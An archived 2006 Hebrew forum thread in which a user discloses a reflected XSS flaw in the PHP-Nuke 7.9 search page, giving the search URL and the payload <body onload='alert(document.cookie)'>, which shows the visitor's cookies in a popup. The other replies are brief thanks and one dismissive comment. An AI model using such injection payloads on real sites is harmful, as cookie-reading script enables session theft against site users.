ארכיון רד-בורד: PHP-Nuke 7.9

09/06/2006 21:45:37 Pr0T3cT10n

הבאג נמצא בחיפוש, בגרסאות PHP-NUKE 7.9, אולי גם בגרסאות קודמות, רק אם PHP-NUKE לא חסמו אותו.
פעלו לפי הצעדים הבאים:
היכנסו לכתובת של האתר.
קוד:
http://www.yoursitehere.com/modules.php?name=Search
או להוסיף אחרי הכתובת את זה:
/modules.php?name=Search

והכניסו בתיבת החיפוש את זה:
קוד:
<body onload="alert(document.cookie)">

לאחר שתלחצו חפש, תופיע לכם הודעה קופצת עם הקוקיס שלכם(העוגיות שלך)
קרדיט ל - O.G שגילה את הבאג.
[ההודעה נערכה על-ידי Pr0T3cT10n ב-09/06/2006 21:47:13]

10/06/2006 05:42:55 dracula

באג מעניין.
תודה על המידע.

10/06/2006 11:11:08 Pr0T3cT10n

בכיף, תהנה.

10/06/2006 12:04:49 Sin

-.- USELESS
תודה בכל מקרה...

רד-בורד: ארכיון

ראשי > אבטחת מידע > PHP-Nuke 7.9 - XSS